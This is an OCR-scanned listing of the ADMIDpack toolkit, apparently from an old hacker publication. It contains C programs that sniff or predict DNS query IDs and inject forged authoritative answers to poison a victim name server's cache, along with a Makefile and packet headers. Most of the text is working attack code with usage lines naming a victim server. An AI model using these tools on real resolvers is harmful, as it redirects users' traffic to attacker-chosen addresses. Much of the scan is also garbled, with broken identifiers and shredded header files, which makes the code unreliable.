void senddnspkt (s,d_ip, wwwname, ip, dns) 


int s; 


u_long d_ip; 
char *wwwname; 


char *ip; 
struct dnshdr *dns; 


{ 


struct sockaddr_in sin; 


TE: . «ae 


char buffer[1024]; 
char *data 
bzero (buffer, sizeof (buffer) ); 
memcpy (buffer, dns, DNSHDRSIZE) ; 


if(dns->qr == 


{ 


(char *) (buffer+DNSHDRSIZI 


GJ 
~~ 
~ 


EB) 


i=makepaketQS (data, wwwname, TYPE_A)j; 


sin.sin_family 
sin.sin_port 


= AF_INET; 
= htons (53); 


sin.sin_addr.s_addr = d_ip; 


sendto(s,buffer, DNSHDRSIZE+i,0, (struct sockaddr *)ésin,L 


} 


else 


{ 


eg 
a 

= 

. 


i=makepaketAW (data,  wwwname, ip, TYPE_A); 
sin.sin_family = AF_INET; 


sin.sin_port 


htons (53); 


sin.sin_addr.s_addr = d_ip; 


sendto(s,buffer, DNSHDRSIZE+i,0, (struct sockaddr *)&ésin,L 


} 


eg 
a 

o& 

. 


void dns_qs_no_rd(s,d_ip, wwwname, ID) 


int s; 

u_long d_ip; 

char *wwwname; 

int ID; 

{ 

struct dnshdr *dns; 

char *data; 

char buffer[1024]; 

Une. 

dns = (struct dnshdr *)buffer; 
data = (char *) (buffer+DNSHDRSIZE) ; 


bzero (buffer, sizeof (buffer) ); 


dns->id 


= htons(ID); 
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dns->qr = 0; 
dns->rd = 0; /* dont want the recusion !! */ 
dns->aa = 0; 


dns->que_num htons (1); 
dns->rep_num = htons (0); 
i=makepaketQS (data, wwwname, TYPE_A); 
senddnspkt (s,d_ip, wwwname, NULL, dns) ; 


void main(int argc, char **argv) 


{ 


struct sockaddr_in sin_rcp; 

struct dnshdr *dns, *dns_recv; 

char *data, *data2; 

char buffer2 [4000]; 

char buffer [4000]; 

char spoofname [255]; 

char spoofip[255]; 

char dnstrust[255]; 

char bla[255]; 

char *alacon; 

unsigned char fakename [255]; 

unsigned char namez[255]; 

unsigned long s_ip, s_ip2; 

unsigned long d_ip, d_ip2, trust; 

unsigned int DA_ID = 65535, loop = 65535; 
int sraw, S_r, i, on=1, x, ID,timez; 
int len = sizeof (struct sockaddr); 


struct dnshdr *) (buffer); 


dns_recv = : 
char *) (buffer+DNSHDRSIZE) ; 


( 
data2 = ( 
dns = (struct dnshdr *)buffer2; 
data = (char *) (buffer2+DNSHDRSIZE) ; 


bzero (buffer2, sizeof (buffer2)); 
srand(time (NULL) ); 


if( (s_r=socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP) ) == ERROR ) { 
perror ("socket"); 
exit (ERROR) ; 
} 

if( (fcentl(s_r,F_SETFL,O_NONBLOCK) ) == ERROR ) { 

perror("fcntl"); 
exit (ERROR) ; 
} 

if ((sraw socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) == ERROR ) { 


perror ("socket"); 
exit (ERROR) ; 
} 


if( (setsockopt (sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) = 
perror("setsockopt"); 
exit (ERROR) ; 
} 


ERROR) ) { 


if(arge < 2) usage(); 


if(argce > 9 )DA_ID = loop = atoi(argv[9]); 
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if(arge > 6)strcpy(spoofname, argv[6]); 

else{ 
printf ("enter the name you wanna spoof:"); 
scanf ("%s",spoofname) ; 


} 


if(arge > 7)strcpy(bla,argv[7]); 
else{ 
printf("enter the ip’s of the spoof name:"); 
scanf("%s",bla); 


} 


alacon =(char *)inet_ntoa(host2ip(bla)); 
strcepy (spoofip, alacon) ; 


if( argc > 8 ) strcpy(bla,argv[8]); 
elsef{ 
printf ("enter the DNS trust of the victim:"); 
scanf("%s",bla); 


} 


alacon =(char *)inet_ntoa(host2ip(bla)); 
strcpy (dnstrust,alacon) ; 


printf ("ADMnoGO00d %s\n", VERSION) ; 

printf ("\033[1lmHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n") ; 
sleep(1); 
printf("\nLets Play =)!!\n"); 


/* save some param */ 


s_ip2 = host2ip(argv[1]); 
d_ip2 = d_ip = host2ip(argv[4]); 
trust = host2ip(argv[2]); 
s_ip = host2ip (UNDASPOOF) ; 
while(1) { 


sprintf (fakename, "%$1%1%1%1%1%1.%38s", 


sendquestion(s_ip,d_ip, fakename, TYPE_A); 


/* end of question packet */ 


bzero (buffer2, sizeof (buffer2)); /* RE init some variable */ 
bzero(namez, sizeof (namez)); 

i=0; 

x=0; 


/* here start the spoof anwser */ 


ID = loop; 
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for(;loop >= ID-10 ;loop--) { 
( 


dns->id = htons (loop); 
dns->qr = 1; 

dns->rd = 1; 

dns->aa =. es 
dns->que_num = htons (1); 


dns->rep_num = htons (1); 


i=makepaketAW (data, fakename, SPOOFIP, TYPE_A); 
udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+1) ; 


} 


bzero (buffer2, sizeof (buffer2)); /* RE init some variable */ 
bzero(namez, sizeof (namez)); 


i=0; 
x=0; 
/* time for test spoof */ 
dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ 
/* non recursive ! */ 
/* we waiting for awnser ... */ 
while (1) { 
for (timez=0;timez < TIMEOUT; timez+t) { 

if( recvfrom(s_r,buffer, sizeof (buffer),0, (struct sockaddr *)&sin_rcep,&len) != -1 ) 
{ 
printf£("ok whe have the reponse ;)\n"); 
timez = 0; 
break; 
} 

usleep (10); 

timeztt; 

} 

if(timez != 0){ 
printf ("hum no reponse from the NS ressend question..\n"); 
dns_qs_no_rd(s_r,d_ip2, fakename,myrand()); 


} 


else break; 


/* ok we have a awnser */ 


printf ("fakename = %s\n",fakename) ; 
if (sin_rcp.sin_addr.s_addr == d_ip2 ) 
if(sin_rcp.sin_port == htons(53) ) 


{ 
if( dns_recv->qr == ) 
if( dns_recv->rep_num == ) /* hum we dont have found the right ID */ 


printf("try Si < ID < Si \n",ID-10,ID); 


elsef{ 

/* Hoho we have the spoof has worked we have found the right ID ! */ 
printf("the DNS ID of %$s iz %i< ID <%i !!\n",argv[4],loop-10,1loop); 
printf("let’s send the spoof...\n"); 


dnsspoof (dnstrust,argv[4],spoofname, spoofip, loop, atoi(argv[5])); 
printf ("spoof sended ...\n"); 
exit (0); 
} 
} /* end of if (sin_rcp.sin_port == htons(53) ) */ 


bzero (buffer, sizeof (buffer) ); 
} /* end of while loop */ 
}/* end of proggies */ 


<--> 
<++> ADMIDpack/ADMsnOOfID.c 
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include "ADM-spoof.c" 
include "dns.h" 
include "ADMDNS2.c" 
include <pcap.h> 


include <net/if.h> 

define DNSHDRSIZE 12 

define SPOOF WT 2-750. e 0a" 
define VERSION "ver 0.6 pub" 
define ERROR -1 

int ETHHDRSIZE; 


void main(argc, argv) 
int argc; 
char *argv[]; 
{ 
struct pcap_pkthdr h; 
struct pcap *pcap_d; 
struct iphdr *ip; 
struct udphdr *udp; 


struct dnshdr *dnsrecv, *dnssend; 
char *data; 

char *data2; 

char *buffer; 

char namefake[255]; 
char buffer2[1024]; 
char ebuf [255]; 

char spoofname [255]; 
char spoofip[255]; 

char bla[255]; 

char dnstrust[255]; 
char *alacon; 

unsigned long s_ipns; 

unsigned long d_ip; 

int sraw, i, on=1, con, ID,DA_ID,type; 


srand( (time(NULL) % random() * random()) ); 


if(arge <2) { 

printf ("usage : %s <device> <ns.victim.com> <your domain> <IP of ur NS> <type 1,12> <spoo 
fname> <spoof ip> <ns trust> \n",argv[0]); 

printf("ex: Ss ethO ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.p 
rovnet.fr ns2.provnet.fr \n",argv[0]); 

printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. now if soml asked for 
the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); 

exit (0); 

} 


~~ 


if (strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; 


else ETHHDRSIZE 14; 


if (argc>5) type=atoi(argv[5]); 


if(arge > 6)strcpy(spoofname, argv[6]); 

else{ 
printf("enter the name you wanna spoof:"); 
scanf("%Ss",spoofname) ; 


} 


if(arge > 7)strcpy(bla,argv[7]); 

else{ 
printf("enter the ip’s of the spoof name:"); 
scanf("%s",bla); 
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alacon =(char *)inet_ntoa(host2ip(bla)); 
strcepy (spoofip, alacon) ; 


if(arge > 8)strcpy(bla,argv[8]); 


elsef{ 


printf("enter the dns trust for the spoof\n"); 


scanf ("Ss",bla) 


} 


1’ 


alacon =(char *)inet_ntoa(host2ip(bla)); 
strcpy (dnstrust,alacon) ; 


dnssend = (struct 


data2 


* 


dnshdr 


(char *) (buffer2+DNSHDRSIZI 


)buffer2; 


bzero (buffer2, sizeof (buffer2)); 


if ( 
perror ("socket"); 
exit (ERROR) ; 
} 


if ( 


(sraw=socket (AF_IN 


(setsockopt (sraw, 


IPPROT 


perror("setsockopt"); 


exit (ERROR) ; 
} 


printf ("ADMsn0OofID.c %s ADM ID sniffer\n",V 


printf ("ADMsnOOfID (\033[5m\033[01mc\033[0m) 


Ou TP; 


GJ 


sleep(1); 

pcap_d = 

s_ipns = host2ip(argv[4]); 
d_ip = host2ip(argv[2]); 
con = myrand(); 

/* make the question for get the ID */ 
sprintf (namefake, 
dnssend->id = 2600; 
dnssend->qr = 0; 
dnssend->rd = 1; 
dnssend->aa = 0; 
dnssend->que_num = htons(1); 
dnssend->rep_num = htons (0); 


i = 


makepaketQS (data2,namefake, TYPE 


udp_send(sraw, sS_ipns, d_ip,2600+con, 
printf ("Question sended...\n"); 


printf("Its Time to w8 \n"); 


A); 
53, buffer2, DNSHDRSIZE+i); 


IP_HDRINCL, 


ET, SOCK_RAW, IPPROTO_RAW) ) 


ERROR) 


(char *)éon, 


ERSION) ; 
ADM, Heike\n"); 


pcap_open_live (argv[1],1024,0,100,ebuf) ; 


{ 


sizeof (on) 


"Sdsdsd.ss",myrand(),myrand(),myrand(),argv[3]); 


while (1) 
{ 
buffer = (u_char *)pcap_next (pcap_d,&h); /* catch the packet */ 
ip (struct iphdr *) (buffert+tETHHDRSIZE) ; 
udp = (struct udphdr *) (buffer+tETHHDRSIZE+IPHDRSIZE) ; 
dnsrecv = (struct dnshdr_ *) (buffert+tETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE 
data = (char *) (buffert+tETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRS1ZI 
if(ip->protocol == IPPROTO_UDP) { 
printf ("([Ss:Si ->",inet_ntoa(ip-—>saddr),ntohs (udp->source) ) ; 


printf ("%s:%i]\n",inet_ntoa (ip->daddr) ,ntohs (udp->dest) ); 


} 


)) 


ERROR) { 
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if (ip->protocol == 17 ) 
if(ip->saddr.s_addr == d_ip ) 
if (ip->daddr.s_addr == s_ipns ) 
if(udp->dest == htons(53) ) 
if (dnsrecv->qr == ) 
{ 
printf ("kewl :)~ we have the packet !\n"); 
ID = dnsrecv->id ; /* we get the id aap 


printf ("the current id of %s is d \n",argv[2],ntohs(ID)); 


DA_ID = ntohs(ID); 


printf("send the spoof...\n"); 
dnsspoof (dnstrust,argv[2],spoofname, spoofip, DA_ID,type) ; 
printf ("spoof sended...\n"); 


exit (0); 
} 


} 


/* well now we have the ID we cant predict the ID */ 


} 
<--> 
<++> ADMIDpack/ADMsniffID.c 


include <pcap.h> 


#include "ADM-spoof.c" 
include "dns.h" 
include "ADMDNS2.c" 


define ERROR -1 
define DNSHDRSIZE 12 
define VERSION "ver 0.4 pub" 


int ETHHDRSIZE; 


void usage () { 

printf ("usage : ADMsniffID <device> <IP> <name> <type of spoof[1,12]> \n"); 
printf ("ex: ADMsniffID ethO \"127.0.0.1\" \"www.its.me.com\" \n"); 

exit (ERROR) ; 

} 


void main(int argc, char **argv) 
{ 
struct pcap_pkthdr h; 
struct pcap *pcap_d; 
struct iphdr *ip; 
struct udphdr *udp; 


struct dnshdr *dnsrecv, *dnssend; 
char *data; 

char *data2; 

char *buffer; 

char SPOOFIP[255]; 

char bla[255]; 

char spoofname [255]; 
char tmp2 [255]; 

char ebuf [255]; 

char buffer2[1024]; 
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unsigned char namez[255]; 
int sraw,on=1,tmpl,type; 


if(arge <2)usage(); 
if (strstr (argv[1],"ppp0") 
else ETHHDRSIZE = 14; 


~~ 


ETHHDRSIZE = 0; 


strcpy (SPOOFIP,argv[2]); 
strcpy (spoofname, argv[3]); 
type = atoi(argv[4]); 


/* Buffer ’n’ tcp/ip stuff */ 


dnssend = (struct dnshdr *)buffer2; 
data2 = (char *) (buffer2+12); 
/* bzero (buffer, sizeof (buffer) ); */ 


bzero(bla, sizeof (bla)); 
bzero (buffer2, sizeof (buffer2)); 


if( (sraw=socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) == ERROR) { 
perror ("socket"); 
exit (ERROR) ; 
} 


if( (setsockopt (sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR) { 
perror("setsockopt"); 
exit (ERROR); 
} 


/* open pcap descriptor */ 


pcap_d = pcap_open_live(argv[1],sizeof (buffer) ,0,100,ebuf) ; 


printf ("ADMsniffID %s (c) ADMnHeike\n", VERSION) ; 
while (1) { 


buffer =(u_char *)pcap_next (pcap_d,&h); /* catch the packet */ 


ip = (struct iphdr *) (buffer+ETHHDRSIZE) ; 
udp = (struct udphdr *) (buffer+tETHHDRSIZE+IPHDRSIZE) ; 
dnsrecv = (struct dnshdr *) (buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE) ; 
data = (char *) (buffert+tETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE) ; 
if (ijp->protocol == 17) 

if (udp->dest == htons(53) ) 


if (dnsrecv->qr == 0) 
{ 
strcpy (namez, data); 
nameformat (namez,bla)j; 
printf ("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr), 
(char *)bla); 


bzero(bla, sizeof (bla)); 

printf ("the question have the type %i and type of the query %i\n" 
,ntohs(*((u_short *) (datatstrlen(data)+1))) 
,ntohs(*((u_short *) (datatstrlen(data)+2+1)))); 


/* well in diz version we only spoof the type ’A’ x7, 
/* check out for a new version in ftp.janova.org/pub/ADM */ 
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printf("make the spoof packet...\n"); 
printf("dns header\n") 


/* here we gonna start to make the spoofed paket :)*/ 


memcpy (dnssend, dnsrecv, DNSHDRSIZE+strlen(namez) +5); 


dnssend->id=dnsrecv->id; /* haha the ID ;) * / 
dnssend->aa=1; /* ifve the authority */ 
dnssend->ra=1; /* i've the recusion */ 
dnssend->qr=1; /* its a awser ef. 
dnssend->rep_num = htons(1); /* i've one awnser * / 
printf ("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n" 
,dnssend->id,ntohs (dnssend->que_num) ,ntohs (dnssend->rep_num) ) ; 
welinie (hOucse fon. wn") 
printf ("domainename=%s\n",data2) ; 
printf ("type of question=%i\n",ntohs(*((u_short *) (data2+strlen(namez)+1)))); 
printf ("type of query=%i\n",ntohs(*((u_short *) (data2+strlen(namez)+1+2)))); 
if( type == YPE_PTR) { 
tmpl=strlen(namez) +5; 
strepy (data2+tmpl,namez) ; 
tmpl=tmpl+strlen(namez) +1; 
bzero(tmp2, sizeof (tmp2) ); 
nameformat (spoofname,tmp2) ; 
printf ("tmp2 = Ss\n",tmp2); 
printf (" mouhahahah \n") 
*((u_short *) (data2+tmpl)) = htons (TYPE_PTR) ; 
*((u_short *) (data2+tmpl1+2) ) = htons(1); 
*((u_long *) (data2+tmp1+2+2) ) = htonl (86400); 
*((u_short *) (data2+tmp1+2+2+4) ) = htons(strlen((tmp2) +1) ) 
printf ("bhaa?.\n"); 
strepy ((data2+tmp1+2+2+4+2),tmp2) ; 
printf£(" ouf !! =) \n") 
tmpl = tmpl t+strlen(tmp2)+ 1; 
} 
if( type == TYPE_A){ 
tmpl=strlen(namez) +5; 
strcepy (data2+tmpl,namez) ; 
pest tmpl+strlen(namez) +1; 
*((u_short *) (data2+tmpl1) ) = htons(TYPE_A); 
*((u_short *) (data2+tmpl1+2) ) = htons(1); 
*((u_long *) (data2+tmp1+2+2) ) = htonl (86400); 
*((u_short *) (data2+tmp1+2+2+4) ) = htons (4); 
*((u_long *) (data2+tmp1+2+2+4+2) ) host2ip(SPOOFIP) ; 
} 
printf ("Answer..\n") 
priate *domatananc=ss kn" tmp2) ; 
printf ("type=%i\n",ntohs(*((u_short *) (data2+tmpl)))); 
printf ("classe=%i\n",ntohs(*((u_short *) (data2+tmpl+2)))); 
printf ("time to live=%u\n",ntohl (*((u_long *) (data2+tmp1+2+2)))); 
ee ey data lenght=%i\n",ntohs(*((u_short *) (data2+tmp1+2+2+4)))); 
printf ("IP=%s\n", inet_ntoa(*((u_long *) (data2+tmp1+2+2+4+2)))); 
tmpl=tmp1+2+2+4+2+4; /* now tmpl == the total length of packet dns */ 
/* without the dnshdr * 


udp_send(sraw 
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, ip->daddr 
,ip->saddr 

ntohs (udp->dest) 
ntohs (udp->source) 


x 


x 


,ouffer2 
, DNSHDRSIZE+tmp1) ; 
} /* end of the spoof * / 
} /* end of while(l) * / 
} /* The End !! ;) uaa 


<--> 
<++> ADMIDpack/Makefile 
version 0.1 
#/usr/contrib/bin/gce —-L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkil1DNS 
SHELL = /bin/sh 
uncomment this if your are not on LinuX 


LIBS lsocket -lnsl -lpcap 
eC = gcc 

LIBS = -lpcap 

BIN = 

CFLAGS = -I. -L. 


all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d 


ADMkil1lDNS: ADMkillDNS.c 
S(CC) S$(CFLAGS) ADMkillDNS.c S$(LIBS) -o $(BIN) /ADMkil1lDNS 


ADMsnOOfID: ADMsnoOOfiID.c 
S(CC) S(CFLAGS) ADMsnOOfID.c S$(LIBS) -o $(BIN) /ADMsnoOfID 


ADMsniffID: ADMsniffID.c 
S$(CC) S(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN) /ADMsniffID 


ADMdnsfuckr: ADMdnsfuckr.c 
$(CC) S(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN) /ADMdnsfuckr 


ADMnOg00d: ADMnOgO0d.c 
$(CC) S$(CFLAGS) ADMnOg00d.c S(LIBS) -o $(BIN) /ADMnOg00d 


clean: 
rm —f S(BIN)/*o $(BIN) /ADMsniffID $(BIN) /ADMsnOOfID $(BIN)/ADMnOg00d \ 
S (BIN) /ADMkillDNS $(BIN) /ADMdnsfuckr 

<--> 

<++> ADMIDpack/bpf.h 

/*- 


Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 
The Regents of the University of California. All rights reserved. 


This code is derived from the Stanford/CMU enet packet filter, 
(net/enet.c) distributed as part of 4.3BSD, and code contributed 
to Berkeley by Steven McCanne and Van Jacobson both of Lawrence 
Berkeley Laboratory. 


Redistribution and use in source and binary forms, with or without 

modification, are permitted provided that the following conditions 

are met: 

1. Redistributions of source code must retain the above copyright 
notice, this list of conditions and the following disclaimer. 

2. Redistributions in binary form must reproduce the above copyright 
notice, this list of conditions and the following disclaimer in the 
documentation and/or other materials provided with the distribution. 

3. All advertising materials mentioning features or use of this software 
must display the following acknowledgement: 

This product includes software developed by the University of 
California, Berkeley and its contributors. 

4. Neither the name of the University nor the names of its contributors 
may be used to endorse or promote products derived from this software 
without specific prior written permission. 


+ + + + + + + F F FF FF FF FF FF FF F F F F F F F KF OF 
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HIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ‘*‘AS IS’’ AND 
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 
PLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS 
E DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 
R ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 
NCLUDING, BUT NO LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

ED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 

D 


5 


Za 
K 


(| 


HOWDPOWDE 
‘= 
> 
Q 
GI 
n 
Hi 


ABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 
UT OF THE USE OF THIS SOFTWARE, EVEN IF ADVIS! OF THE POSSIBILITY OF 


Gl 


NOHrFTOUMPHPH 


@(#)bpf.h 7.1 (Berkeley) 5/7/91 


@(#) SHeader: bpf.h,v 1.36 97/06/12 14:29:53 leres Exp $ (LBL) 


+ + + + FF + + + FF F F FF FF F FF OF 


ifndef BPF_MAJOR_VERSION 


/* BSD style release date */ 
define BPF_RELEASE 199606 


typedef int bpf_int32; 
typedef u_int bpf_u_int32; 


/* 
* Alignment macros. BPF_WORDALIGN rounds up to the next 
* even multiple of BPF_ALIGNMENT. 


aul 
define BPF_ALIGNMENT sizeof (bpf_int32) 
define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1)) &~ (BPF_ALIGNMENT-1) ) 


define BPF_MAXINSNS 512 


define BPF_MAXBUFSIZE 0x8000 
define BPF_MINBUFSIZE 32 
/* 

* Structure for BIOCSETF. 

* / 


struct bpf_program { 

u_int bf_len; 

struct bpf_insn *bf_insns; 
}; 


/* 
* Struct returned by BIOCGSTATS. 
se 
struct bpf_stat { 
u_int bs_recv; /* number of packets received */ 
u_int bs_drop; /* number of packets dropped */ 


Struct return by BIOCVERSION. This represents the version number of 
the filter language described by the instruction encodings below. 
bpf understands a program iff kernel_major == filter_major && 
kernel_minor >= filter_minor, that is, if the value returned by the 
running kernel has the same major number and a minor number equal 
equal to or less than the filter being downloaded. Otherwise, the 
results are undefined, meaning an error may be returned or packets 
may be accepted haphazardly. 

It has nothing to do with the source code version. 


+ £ F + F F F HF 


* 


Ai 
struct bpf_version { 
u_short bv_major; 
u_short bv_minor; 
}; 


/* Current version number of filter architecture. */ 
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define BPF_MAJOR_VERSION 1 
define BPF_MINOR_VERSION 1 


33 


/* 
* BPF ioctls 
* 
* The first set is for compatibility with Sun’s pcc style 
* header files. If your using gcc, we assume that you 
* have run fixincludes so the latter set should work. 
*/ 
if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) 
define BIOCGBLE _TIOR(B,102, u_int) 
#define BIOCSBLE _TOWR(B,102, u_int) 
define BIOCSETF _IOW(B,103, struct bpf_program) 
define BIOCFLUSH _1I0(B,104) 
define BIOCPROMISC _1I0(B,105) 
define BIOCGDLT _IOR(B,106, u_int) 
define BIOCGETIE _IOR(B,107, struct ifreq) 
define BIOCSETIF _IOW(B,108, struct ifreq) 
define BIOCSRTIMEOU _IOW(B,109, struct timeval) 
define BIOCGRTIMEOU IOR(B,110, struct timeval) 
define BIOCGSTATS IOR(B,111, struct bpf_stat) 
define BIOCIMMEDIATE IOW(B,112, u_int) 
define BIOCVERSION IOR(B,113, struct bpf_version) 
define BIOCSTCPF TOW(B,114, struct bpf_program) 
define BIOCSUDPF IOW(B,115, struct bpf_program) 
else 
define BIOCGBLEN _IOR(’B’,102, u_int) 
define BIOCSBLEN _IOWR(’B’,102, u_int) 
define BIOCSETF _IOW(’B’,103, struct bpf_program) 
define BIOCFLUSH _1I0(’B’,104) 
define BIOCPROMISC _1I0(’B’,105) 
define BIOCGDLT _IOR(’B’,106, u_int) 
define BIOCGETIF _IOR(’B’,107, struct ifreq) 
define BIOCSETIE _IoW(’B’,108, struct ifreq) 
define BIOCSRTIMEOU _IOWw(’B’,109, struct timeval) 
#define BIOCGRTIMEOUT _IOR(’B’,110, struct timeval) 
define BIOCGSTATS _IOR(’B’,111, struct bpf_stat) 
define BIOCIMMEDIATE _IOW(’B’,112, u_int) 
define BIOCVERSION _IOR(’B’,113, struct bpf_version) 
define BIOCSTCPF IOW(’B’,114, struct bpf_program) 
define BIOCSUDPF IOW(’B’,115, struct bpf_program) 
endif 
/* 
* Structure prepended to each packet. 
se 
struct bpf_hdr { 
struct timeval bh_tstamp; /* time stamp */ 
bpf_u_int32 bh_caplen; /* length of captured portion */ 
bpf_u_int32 bh_datalen; /* original length of packet */ 
u_short bh_hdrlen; /* length of bpf header (this struct 


* Because the structure above is not a multiple of 4 bytes, 


* Only the kernel needs to know about it; 


* will insist on inserting padding; 
a 

ifdef KERNEL 

tdefine SIZEOF_BPF_HDR 18 

endif 
/* 


* Data-link level typ 
*/ 

define DLT 
define DL 


_NULL 
_EN10MB 


codes. 


0 [% 
1 pe 


Ethernet 


plus alignment padding) */ 


some compilers 
sizeof (struct bpf_hdr) won’t work. 
applications use bh_hdrlen. 


hence, 


no link-layer encapsulation */ 
(10Mb) */ 
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define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ 
define DLT_AX25 3 /* Amateur Radio AX.25 */ 

define DLT_PRONET 4 /* Proteon ProNET Token Ring */ 
define DLT_CHAOS 5 /* Chaos */ 

define DLT_IEEE802 6 /* IEEE 802 Networks */ 

define DLT_ARCNE a /* BRCNET */ 

define DLT_SLIP 8 /* Serial Line IP */ 

define DLT_PPP 9 /* Point-to-point Protocol */ 
define DLT_FDDI 10 /* FDDI */ 

define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */ 
define DLT_RAW 12 /* raw IP */ 

define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */ 
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */ 
/* 

* The instruction encondings. 

ay 


/* instruction classes */ 


defi 
defi 
defi 
de 
de 
de 


B- 


= 


Fy FH FH Fh FH FM 


He Be BE BS 


Q. 

O) 
Fh Fh Fh FH FH FA FH FH FH Fh I 
EE ele a tl 


defi 
defi 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 


= 


H- 


FHF Fh FA FH EFA EF) FF FE FH FA FH Fh Fh Ih 


He BB BB BBB BBB 


defi 
defi 


ne 
ne 
ne 
ne 
ne 
ne 
ne 
ne 
ne 
ne 
ne 


ine 


ne 


BPF_SIZE 


BPF_MODE 


/* misc */ 
ne BPF_MISCOP (code) 


ne BPF_CLASS (code) 
ne BPF_LD 
ne BPF_LDX 
ne BPF_ST 
ne BPF_STX 
ne BPF_ALU 
ne BPF_JMP 
ne BPF_RET 
ne BPF_MISC 


/* ld/ldx fields */ 


/* alu/jmp fields */ 


ne BPF_OP (code) 

ne BPF_ADD 
ne BPF_SUB 
ne BPF_MUL 
ne BPF_DIV 
ne BPF_OR 
ne BPF_AND 
ne BPF_LSH 
ne BPF_RSH 
ne BPF_NEG 
ne BPF_JA 
ne BPF_JEQ 
ne BPF_JGT 
ne BPF_JGE 
ne BPF_JSET 
ne BPF_SRC (code) 
ne BPF_K 
ne BPF_X 


BPF_A 


BPF_TAX 


( (code) 


( (code) 


( (code) 


( (code) 


& 0x07) 
0x00 
0x01 
0x02 
0x03 
0x04 
0x05 
0x06 
0x07 


& 0x18) 
0x00 
0x08 
0x10 
& Oxe0) 
0x00 
0x20 
0x40 
0x60 
0x80 
Oxa0 


& Oxf0) 
0x00 
0x10 
0x20 
0x30 
0x40 
0x50 
0x60 
0x70 
0x80 
0x00 
0x10 
0x20 
0x30 
0x40 
& 0x08) 
0x00 
0x08 


t - BPF_K and BPF_X also apply */ 
ine BPF_RVAL (code) 


& 0x18) 
0x10 


& 


Oxf8) 


0x00 
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/* 


* The instruction data structure. 


*/ 
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0x80 


BPF_TXA 


struct bpf_insn { 


} . 


la 


/* 


* Macros for insn array initializers. 


x] 
defi 
defi 


ifdef K 
exter 
exter 
exter 
exter 


else 
et 


exter 


endif 
endif 


/* 


* Number of scratch memory words 


*/ 


define BPF_M 


endif 
<--> 
<++> ADMIDpack/dns.h 


#defi 


ERNEL 


struct dns 


U 


GG Ga & 


Ge 1G Ge 


nsig 


nsig 
nsig 
nsig 
nsig 
nsig 


nsig 
nsig 
nsig 
nsig 


<--> 
<++> ADMIDpack/ip.h 


ned 


ned 
ned 
ned 
ned 
ned 


ned 
ned 
ned 
ned 


ned 
ned 
ned 
ned 


qaaaQaa 


nnn Nn 


-- tS TDG. 
n u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); 


ne DNSHDRSIZ! 


hdr 
hort 


nar 
nar 
nar 
nar 
nar 


nar 
nar 
nar 
Mack 


hort 
hort 
hort 


hort 


u_short code; 
u_char 
u_char 
bpf_int32 k; 


jt; 
jf; 


n u_int bpf_filter(); 
n void bpfattach(); 

n void bpf_tap(); 

n void bpf_mtap(); 


EMWORDS 16 


12 


GJ 


{ 


int id; 


Las 1e 
teal; 
aa:l; 
opcode:4; 
fo paar 


rcode:4; 
unused:2; 
pr:l; 
Kasil 


int que_num; 
int rep_num; 
int num_rr; 
int num_rrsup; 


/* adapted from tcpdump */ 


ifndef IPV 
#define IPV 


endif 


GJ 


ERSION 


RSION 4 


/* IPV 


ERISON */ 


sie 


/* 
/* 
/* 
/* 
/* 


/* 
/* 
/* 
/* 


ne BPF_STMT(code, k) { (u_short) (code), 0, 0, k } 
ne BPF_JUMP(code, k, jt, 


{ (u_short) (code), jt, 


(for BPF_LD|BPF_MEM and BPF_ST). 


recursion desired */ 
truncated message */ 
authoritive answer */ 
purpose of message */ 
response flag */ 


response code */ 

unused bits */ 

primary server required 
recursion available */ 


(non standard) 


ai 
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struct iphdr { 
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u_char ihl:4, /* header length */ 
version:4; /* version */ 
u_char tos; /* type of service */ 
short tot_len; /* total length */ 
u_short id; /* identification */ 
short off; /* fragment offset field */ 
define IP_DF 0x4000 /* dont fragment flag */ 
define IP_MF 0x2000 /* more fragments flag */ 
u_char ttl; /* time to live */ 
u_char protocol; /* protocol */ 
u_short check; /* checksum */ 
